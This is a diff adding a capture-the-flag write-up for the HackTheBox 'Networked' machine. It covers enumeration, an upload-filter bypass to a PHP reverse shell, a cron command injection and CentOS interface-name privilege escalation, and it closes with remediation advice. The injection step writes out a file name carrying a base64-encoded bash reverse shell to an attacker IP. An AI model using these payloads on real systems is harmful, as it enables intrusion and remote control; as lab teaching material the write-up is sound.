add: writeup-ctf

content/writeup-ctf/writeup-networked-htb/index.md

@@ -0,0 +1,194 @@
+---
+title: "Writeup - Networked (HTB)"
+date: 2022-05-27
+slug: "writeup-networked-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Networked](https://app.hackthebox.com/machines/Networked) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.4)
+- 80/tcp : HTTP web server (Apache 2.4.6)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First, I start by scanning the pages of the website.
+
+![](img/image-3.webp)
+
+I find several pages interesting and especially `backup` in which you can find an archive.
+
+![](img/image-4.webp)
+
+I download the archive, unzip it and find the following files inside:
+
+![](img/image-5.webp)
+
+The different files correspond to pages of the site:
+
+![](img/image-6.webp)
+
+![](img/image-7.webp)
+
+So we have the possibility to upload images on the `upload.php` page and then to view them on the `photos.php` page.
+
+By analyzing the source code of the `upload.php` page I find that there are checks on the upload files.
+
+
+```php
+[...]
+list ($foo,$ext) = getnameUpload($myFile["name"]);
+    $validext = array('.jpg', '.png', '.gif', '.jpeg');
+    $valid = false;
+    foreach ($validext as $vext) {
+      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
+        $valid = true;
+      }
+    }
+[...]
+```
+So I'm not just going to be able to send a PHP reverse shell with the `.png` extension because the site checks the file signature to verify its type. The signature of a file is a set of magic byte at the beginning of a file. By looking in the following list I find the signature of the GIF files: [files signatures](https://en.wikipedia.org/wiki/List_of_file_signatures).
+
+Before adding the signature, my file is simply a Unicode text:
+
+![](img/image-8.webp)
+
+After adding the GIF signature, we can see that the file is now identified as a GIF image data.
+
+![](img/image-9.webp)
+
+In addition to this signature I will have to change the extensions so that the file passes the security, but also that it is executed as PHP by the server:
+
+
+```bash
+mv reverse.jpg reverse.php.gif
+```
+I can now upload it and go view it to execute the code and run the reverse shell.
+
+![](img/image-10.webp)
+
+I now have a reverse shell as `apache`. But I don't have the access to see the first flag. In the user's home folder, I notice 2 interesting files:
+
+![](img/image-11.webp)
+
+The first one is a CRON file that executes the `check_attack.php` script every 3 minutes.
+
+
+```bash
+*/3 * * * * php /home/guly/check_attack.php
+```
+The second one is the script that allows you to delete suspicious files from the `/var/www/html/uploads` :
+
+
+```php
+<?php
+require '/var/www/html/lib.php';
+$path = '/var/www/html/uploads/';
+$logpath = '/tmp/attack.log';
+$to = 'guly';
+$msg= '';
+$headers = "X-Mailer: check_attack.php\r\n";
+
+$files = array();
+$files = preg_grep('/^([^.])/', scandir($path));
+
+foreach ($files as $key => $value) {
+        $msg='';
+  if ($value == 'index.html') {
+        continue;
+  }
+  #echo "-------------\n";
+
+  #print "check: $value\n";
+  list ($name,$ext) = getnameCheck($value);
+  $check = check_ip($name,$value);
+
+  if (!($check[0])) {
+    echo "attack!\n";
+    # todo: attach file
+    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
+
+    exec("rm -f $logpath");
+    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
+    echo "rm -f $path$value\n";
+    mail($to, $msg, $msg, $headers, "-F$value");
+  }
+}
+
+?>
+```
+Interestingly, the script executes an `rm` command with a variable directly. All this without verification! So I will be able to create a file with a name composed of a command.
+
+The file name will be composed of a name, then a `;` to indicate the end of the command, then a reverse shell in base64 because we are not allowed to put `/` in the file name.
+
+To create the file I use the following command:
+
+
+```bash
+touch /var/www/html/uploads/test';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzUgMD4mMQo= | base64 -d | bash'
+```
+I wait a few seconds and now I have a reverse shell and I can get the first flag.
+
+![](img/image-12.webp)
+
+## Privilege escalation
+
+First I check the sudo permissions of my user :
+
+![](img/image-13.webp)
+
+I have the right to run the `changename.sh` script as root. Looking at the code of the script, I determine that it allows to change the name of a network interface.
+
+
+```bash
+#!/bin/bash -p
+cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
+DEVICE=guly0
+ONBOOT=no
+NM_CONTROLLED=no
+EoF
+
+regexp="^[a-zA-Z0-9_\ /-]+$"
+
+for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
+        echo "interface $var:"
+        read x
+        while [[ ! $x =~ $regexp ]]; do
+                echo "wrong input, try again"
+                echo "interface $var:"
+                read x
+        done
+        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
+done
+```
+After some research on the Linux distributions used by the machine I find the following flaw: [CentOS Network Interface Exploit](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f).
+
+On CentOS there is an exploit that allows to execute commands as `root` via the name of a network interface.
+
+I execute the script and enter the following name for the interface:
+
+![](img/image-14.webp)
+
+I now have a reverse shell `root` and I can get the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave the source code of the website accessible by all
+- Set up an additional protection on the upload to avoid sending code
+- Do not use variables in commands without Sanitizing